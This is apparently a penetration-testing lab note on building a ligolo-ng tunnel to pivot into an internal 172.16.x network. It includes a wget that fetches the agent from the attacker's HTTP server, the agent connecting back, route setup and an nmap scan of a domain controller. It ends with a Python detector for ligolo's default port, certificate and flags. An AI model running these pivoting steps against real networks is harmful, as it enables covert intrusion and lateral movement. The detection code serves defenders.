---
# System prepended metadata

title: Ligolo Tunnel

---


# Ligolo Tunnel
[Tool link - GitHub](https://github.com/nicocha30/ligolo-ng)

![Ligolo](https://hackmd.io/_uploads/S176gCjokg.png)



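Three hosts are currently known: 172.16.1.100, 172.16.1.20, and 172.16.2.5. In the diagram, a green line means a host can access the other host's data, and a red line means it cannot. To let .100 also access data on .2.5, packets have to be proxied through a covert tunnel. This note shows how to build that tunnel with Ligolo.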

Packet protocols that Ligolo can proxy:
1. TCP
2. UDP
3. ICMP (key!!!)

Set up the Ligolo server on the attacker machine

```zsh
$ sudo ./proxy -selfcert

WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC! 
WARN[0000] Using self-signed certificates               
WARN[0000] TLS Certificate fingerprint for ligolo is: AB1D343AABAE24C7B25E7155B02B3D8348ED99A36A7D208DE99C514201411CD3 
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng »
```

Also start an HTTP server to make file transfer easier
```zsh
python3 -m http.server
```
## Single Pivoting
First, download the Ligolo agent on .100
```
wget http://10.10.14.2:8000/agent -O agent
```
Agent compatibility depends on the operating system and still needs to be confirmed.

Next, start the agent and connect back to the server
```zsh
$ ./agent -connect 10.10.14.2:11601 -ignore-cert
WARN[0000] warning, certificate validation disabled     
INFO[0000] Connection established    addr="10.10.14.2:11601"
```
```zsh
INFO[0000] Listening on 0.0.0.0:11601                   
    __    _             __                       
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ / 
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /  
        /____/                          /____/   

  Made in France ♥            by @Nicocha30!
  Version: 0.7.5

ligolo-ng » 
ligolo-ng » 
ligolo-ng » 
ligolo-ng » INFO[0630] Agent joined.      id=a6a358a7-d4f7-4a02-9521-6112e369c32c remote="10.10.110.100:35890"
```
Back on the server, you can see `Agent joined.`

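Next, set up the routing table
```zsh
$ sudo ip tuntap add user {username} mode tun {tunnel_name}
$ sudo ip link set ligolo up
```
The username is the account name on the machine; here mine is kali.
Tunnel name: ligolo
Then bring the ligolo interface up.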

Add the route:
```zsh
sudo ip route add 172.16.1.0/24 dev ligolo 
```
Route added successfully!
```zsh
$ ip route list
default via 192.168.216.2 dev eth0 proto dhcp src 192.168.216.134 metric 100 
10.10.14.0/23 dev tun0 proto kernel scope link src 10.10.14.2 
10.10.110.0/24 via 10.10.14.1 dev tun0 
172.16.1.0/24 dev ligolo scope link linkdown  
192.168.216.0/24 dev eth0 proto kernel scope link src 192.168.216.134 metric 100 
```
Back on the server, start the tunnel
```zsh
[Agent : 10.10.110.10] » tunnel_start --tun ligolo
[Agent : 10.10.110.10] » INFO[11152] Starting tunnel to 10.10.110.10 (a6a358a7-d4f7-4a02-9521-6112e369c32c) 
[Agent : 10.10.110.10] » tunnel_list
┌───────────────────────────────────────────┐
│ Active tunnels                            │
├───┬───────────────────────────┬───────────┤
│ # │ AGENT                     │ INTERFACE │
├───┼───────────────────────────┼───────────┤
│ 1 │ 10.10.110.10              │ ligolo    │
└───┴───────────────────────────┴───────────┘
```

Add a listener
```zsh
ligolo-ng » session
? Specify a session : 1 - 10.10.110.100:35890 - a6a358a7-d4f7-4a02-9521-6112e369c32c
[Agent : 10.10.110.100] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp
INFO[10636] Listener 0 created on remote agent!
```
Tunnel established successfully!
```zsh
└─$ sudo nmap -F -sT -Pn -sV -T4 -O 172.16.1.20
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-10 01:57 EDT
Nmap scan report for 172.16.1.20
Host is up (0.21s latency).
Not shown: 77 closed tcp ports (conn-refused)
PORT      STATE    SERVICE        VERSION
21/tcp    filtered ftp
22/tcp    filtered ssh
25/tcp    filtered smtp
53/tcp    open     domain         Simple DNS Plus
80/tcp    open     http           Microsoft IIS httpd 8.5
88/tcp    open     kerberos-sec   Microsoft Windows Kerberos (server time: 2025-03-10 05:57:32Z)
135/tcp   open     msrpc          Microsoft Windows RPC
139/tcp   open     netbios-ssn    Microsoft Windows netbios-ssn
199/tcp   filtered smux
389/tcp   open     ldap           Microsoft Windows Active Directory LDAP 
443/tcp   filtered https
445/tcp   open     microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 86.83 seconds
```
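
The proxy's own startup warning above ("beware of CTI, SOC and IoC!") points at the defaults a defender can match on. The following is an added example, not part of the original note or of the ligolo-ng project: it checks constructed JSON log events against three defaults visible in the output above (port 11601, the self-signed certificate domain `ligolo`, and the agent flags `-connect` / `-ignore-cert`). The event schema and field names are hypothetical, it assumes a sensor that records the certificate subject, and all three defaults can be changed by the operator.

```python
import json

# Indicators taken from the output shown on this page.
DEFAULT_PORT = 11601            # "Listening on 0.0.0.0:11601"
DEFAULT_CERT_DOMAIN = "ligolo"  # "Using default selfcert domain 'ligolo'"
AGENT_FLAGS = ("-connect", "-ignore-cert")

# Constructed sample events; the field names are a hypothetical schema.
SAMPLE_LOG = """\
{"type":"conn","src":"10.10.110.100","dst":"10.10.14.2","dport":11601,"tls_subject":"CN=ligolo"}
{"type":"conn","src":"10.10.110.100","dst":"10.10.14.2","dport":8000,"tls_subject":""}
{"type":"proc","host":"10.10.110.100","cmdline":"./agent -connect 10.10.14.2:11601 -ignore-cert"}
{"type":"proc","host":"10.10.110.100","cmdline":"wget http://10.10.14.2:8000/agent -O agent"}
{"type":"conn","src":"172.16.1.20","dst":"203.0.113.7","dport":443,"tls_subject":"CN=LIGOLO"}
not-json garbage line
"""

def score_event(ev):
    """Return the list of indicator names that one event matches."""
    hits = []
    if ev.get("type") == "conn":
        if ev.get("dport") == DEFAULT_PORT:
            hits.append("default-port")
        if DEFAULT_CERT_DOMAIN in str(ev.get("tls_subject", "")).lower():
            hits.append("default-cert-domain")
    elif ev.get("type") == "proc":
        args = str(ev.get("cmdline", "")).split()
        if all(flag in args for flag in AGENT_FLAGS):
            hits.append("agent-cmdline")
    return hits

def scan(log_text):
    """Parse JSON lines, skip malformed ones, return (line_no, hits) pairs."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate truncated or non-JSON lines
        if not isinstance(ev, dict):
            continue
        hits = score_event(ev)
        if hits:
            findings.append((n, hits))
    return findings

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, ",".join(hits))
```

An event that matches two indicators, such as the first sample line, is a much stronger signal than a port match alone.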

References:
https://www.youtube.com/watch?v=de7IP_uZK6E
https://www.ctfiot.com/162602.html
https://docs.ligolo.ng/sample/basic/
